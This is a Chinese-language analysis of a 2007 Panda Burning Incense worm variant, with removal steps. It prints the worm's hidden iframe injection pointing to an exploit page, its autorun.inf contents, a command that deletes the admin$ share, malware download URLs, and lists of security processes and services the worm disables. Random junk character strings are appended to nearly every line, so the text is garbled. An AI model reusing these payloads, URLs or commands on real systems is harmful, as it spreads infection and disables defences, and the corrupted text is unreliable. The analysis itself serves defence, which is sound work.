熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe v:E;^$6Vn  
z v>Oh#  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） cJCU*(7&  
B`
fH^N  
中文名称：（尼姆亚，熊猫烧香） o\Uu?.-<  
tJNIr5o  
病毒大小：68,570 字节 YutQ]zYA.  
H$!+A  
编写语言：Borland Delphi 6.0 - 7.0 GF8 -_X  
.}q]`<]ze  
加壳方式：FSG 2.0 -> bart/xt fAGctRGH  
OF[?Z  
发现时间：2007.1.16 l<
(cd,  
OOnX`  
危害等级：高 #uSK#>H_!  
8-m 3e  
一、病毒描述： AEY$@!8  
[#Y' dFQ  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 VPt9QL(  
%Tv^GP{}  
二：中毒现象： .[?BlIlm  
Tzzq#z&F  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 WK0C  
p~&BChBl!=  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 =7%oE[  
WF2NG;f=  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 ]ab#q=  
E V2 )  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> 2?W7I/F  

|Y},V_@d  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 j(eFoZz,  
D'b#,a;V  
6：不能正常使用任务管理器，SREng.exe等工具。 $d/&k`  
ye%iDdf  
7：无故的向外发包，连接局域网中其他机器。 9@K.cdRjQ  
d-
-'Rn5  
三：技术分析 (u hd "  
~=En+J}*  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe <@G8ni  
eS'yGY0b  
建立注册表自启动项: vi!YN|}\  
S{#cD1>.  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] uLQ  
}fZ`IOf  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" -oyO+1V  
Wh( |+rJ?Z  
2：查找反病毒窗体病毒结束相关进程: 3GH(wSv9\  
D\1k.tI  
天网防火墙 H={&3poBz  
"5Uh<X  
virusscan x;LzG t:w  
El- ? %  
symantec antivirus 6GAaV[])'  
52d^K0STC  
system safety monitor QAPu<rdJP  
.fYZ*=P;c  
system repair engineer k|YWOy@D~  
&QNY,Pj  
wrapped gift killer cXnKCzSxZq  
$HJTj29/  
游戏木马检测大师 -nbMTY}  
1LnyWZ  
超级巡警 |Ic`,>XM  
DgHaOAdU  
3：结束以下进程: p\p\q(S">  
&?,6~qm[  
mcshield.exe p(F" /  
FV39QG4b4  
vstskmgr.exe zYY$
D.  
tK(g-u0N`(  
naprdmgr.exe #A7jyg":  
&HW1mNF9  
updaterui.exe ZR0r>@M3v<  
1oLv.L  
tbmon.exe E.`U`L  
A{eLl  
scan32.exe )~J>X{hy  
Ih}1%Jq  
ravmond.exe ?, r~=  
6K`c/)  
ccenter.exe mmXm\]r>4  
v``-F(i$  
ravtask.exe H( jXI  
i_Re*  
rav.exe hU]HTX'R  
DQ#H,\^<  
ravmon.exe ;< jbLhHwD  
YgUH'P-  
ravmond.exe cF)/^5Z  
A- YBQPE  
ravstub.exe 7dG79H  
TjMe?p  
kvxp.kxp ?~"bR%  
g
>rp@M  
kvmonxp.kxp YTQt3=1ii  
}9HmTr|  
kvcenter.kxp
kum#^^4G|  
'ly?P8h  
kvsrvxp.exe >T2LEW  
VV4Gjc  
kregex.exe '>$EOg"  
i,A#&YDl  
uihost.exe 1OLqL
 
RO;Bl:x4  
trojdie.kxp ,;?S\V  
Ji1Pz)fq  
frogagent.exe -oeL{9;  
*-W#G}O0  
kvxp.kxp T{qTj6I  
G+xt5n.%  
kvmonxp.kxp Aa0b6?Jm  
pLa[}=  
kvcenter.kxp R[z`:1lo  
f<=Fsl  
kvsrvxp.exe YjF|XPv+ l  
DFhXx6]  
kregex.exe _lzyMEdr  
!Fo*e  
uihost.exe iv`O/T  
;6@r-r  
trojdie.kxp V.ht, ~l  
F' U 50usV  
frogagent.exe y@
2epY?{  
[b{CkX06  
logo1_.exe o1&:r
y  
7Dnp'*H  
logo_1.exe O#wpbrJ  
O}9KJU  
rundl132.exe (b?{xf'
G  
X[#zCM  
taskmgr.exe *
 tCS  
08X_}97#WF  
msconfig.exe Pe C7  

!O\;Nua  
regedit.exe [
E#UGJ@  
[."[pY  
sreng.exe 8WE{5#oi  
4：禁用下列服务: %Qg+R26U  
5es[Ph|K5  
schedule J=.`wZQkS  
dz~coZ9  
sharedaccess UAR5^  
^[%%r3"$C  
rsccenter eC5$#,HiC  
6wco&7   
rsravmon zF5uN:-s  
$/6;9d^  
rsccenter QwhRNnE=  
l5
l>d62  
kvwsc w9 w%&{j  
e><5Pr
)  
kvsrvxp G=;k=oX(  
>~`C-K#  
kvwsc Kwc6mlw~M  
s2j['g5  
kvsrvxp .]aF 1}AI  
x0d~i!d  
kavsvc Bgmn2-  
Ra*e5  
avp }j,[ 1@S  
JCAq8=zM  
avp JG{j)O|L  
L 8{\r$  
kavsvc &3J@BMYp  
jA#/Z  
mcafeeframework p4VeRJk%  
6_N(;6kx(  
mcshield Kx_h1{  
'zh7_%  
mctaskmanager K't]n{$  
nx0K$Ptq  
mcafeeframework xkOpa,=FI  
Scv#zuv_  
mcshield LJoGpr8  
u&wiGwF[  
mctaskmanager Zo>]rKeV  
pLv$\MiZ  
navapsvc p&VU0[LIC0  
AyMd:5;  
wscsvc *%KKNT'*  
+l=r#JF  
kpfwsvc 4Jx"A\5*G  
XD"_Iq!  
sndsrvc ^&g=u5 d0  
?WE  
ccproxy u^029sH6j  
] }f9JNf$  
ccevtmgr .xBu-?6s6  
uYrfm:4S  
ccsetmgr M:5b4$Qh<  
v9T_
&  
spbbcsvc cyJG8f  
s`>[F@N7.o  
symantec core lc l3 DYg  
{\[5}nV  
npfmntor N>>uCkC  
dK>7fy;mv  
mskservice @?"h !fyu  
r1fGJv1!o  
firesvc S;]*)i,v  
Hr$QLtr  
5：删除下列注册表项: XV^1tX>f{  
SM@QUAXO  
software\microsoft\windows\currentversion\run\ravtask tnLAJ+-M  
^wS5>lf7p  
software\microsoft\windows\currentversion\run\kvmonxp {/pm<k=  
ul*Q
t}  
software\microsoft\windows\currentversion\run\kav c&L"N!4z  
3MRc4UlB  
software\microsoft\windows\currentversion\run\kavpersonal50
0T46sm r  
kY'T{Sm1^  
software\microsoft\windows\currentversion\run\mcafeeupdaterui /a6Xa&(B  
ES40?o*]x  
software\microsoft\windows\currentversion\run\network associates error reporting service rb{P :MX  
[|l?2j\  
software\microsoft\windows\currentversion\run\shstatexe 2<}NB?f`N  
0>zbCubPH  
software\microsoft\windows\currentversion\run\ylive.exe S6[v;{xJ  
Ag@;  
software\microsoft\windows\currentversion\run\yassistse 9Vf1Xz  
xCtmXo  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） ;V<fB/S.=+  
'MY/*k7:  
7：跳过下列目录: D.mHIsX6\  
_2N$LLbg  
windows O eL}EVs8=  
Onwp-!!.  
winnt Y/7 $1
k  
im @h -A]0  
systemvolumeinformation \m1~jMz*>k  
!A%<#Gjt  
recycled ?@V[#.  
t#2(j1  
windowsnt &~W:xg(jN  
9*a=iL*Nw  
windowsupdate ?Ae ven  
`hb%+-lj+  
windowsmediaplayer QcpXn4/*  
\<g*8?yFs  
outlookexpress ~s5SZK*  
[p<w._b i  
netmeeting 8Ac:_Zg  
db6mfxi  
commonfiles @*sWu_-Y%  
AnT3M.>ek  
complusapplications H*)NLp  
KVJ_E
!i  
commonfiles ? YG)I;(  
G.UI|r/Kz  
messenger IC7M$  
k1!@^A  
installshieldinstallationinformation %Z1N;g0  
,2W8=ON  
msn MNV% =G  
4#lo$#  
microsoftfrontpage Gy(=706  
)-._FOZ6  
moviemaker GP#aya  
ctGL-kp  
msngaminzone ?F3h)(}  
r >nG@A  
8：删除*.gho备份文件. m|G'K[8  
&Udb9  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. Cid ;z  
Z+=@<
i''  
autorun.inf内容： UNBH   
pJtex^{!:  
程序代码 1 9CK+;b  
^cuc.g)c$?  
[AutoRun] =z /dcC$r  
&mx)~J^m  
OPEN=setup.exe .*
)2SNH  
9_5ow  
shellexecute=setup.exe ;-qO'V:;  
$\U4hHOo  
shell\Auto\command=setup.exe ~5oPpTAe  
IqoR7ajA  
10：删除共享：cmd.exe /c net share admin$ /del /y %xyou:~0zs  
Kh_Lp$'0uM  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 uwy:t!(j  
&*aIEa^  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 EU+S^SyZi  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 qO|R^De  
VB*oGG  
目前下载列表如下： 3zc
U%*  
W*I(f]8:y`  
http://www.krvkr.com/down/cq.exe Iepsz  
V6,H}k  
http://www.krvkr.com/down/mh.exe Ev}C<zk*  
"L&#lfOKG  
http://www.krvkr.com/down/my.exe @W"KVPd  
 ^0\  
http://www.krvkr.com/down/wl.exe ~G6Ox)/  
/x p|  
http://www.krvkr.com/down/rx.exe XLrwxj0  
/$p6'1P8  
http://www.krvkr.com/down/wow.exe [UWdW  
%#xaA'? [  
http://www.krvkr.com/down/zt.exe (bH`x]h#  
S;286[oq@  
http://www.krvkr.com/down/wm.exe R[hzMU}KB  
YOmM=X+'H  
http://www.krvkr.com/down/dj.exe \6Zr  
lrIjJ V  
http://www.krvkr.com/cn/iechajian.exe !`Hd-&}bYz  
BdH-9n~,  
到此病毒行为分析完毕。 sW'2+|3"  
;"~ fZ2$U  
四：Sec120.Com专家解决方案： eEv@}1~  
HOJs[m
qB%  
1：关闭网络共享，断开网络。 /n{omx  
+{f:cea (1  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） UKT%13CO4U  
ORJIo
  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 
po2!  
67G?K;)e  
4：删除注册表启动项 Vg>dI&O  
b((M)Gz  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] /YMj-S_b~  
tne ST.  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" >\P@^ h]  
oldA#sA$  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe K1+)4!}%U  
afuOeZP  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 %u5L!W&  
%Q fO8P  
7：如果电脑上有脚本文件，将病毒代码全部删除。 ogHCt{'  
][+#;avU  
8：关闭系统的自动播放功能。 ?R$F)g7<  
~5%W:qw
Q  
这样就基本上将病毒清除了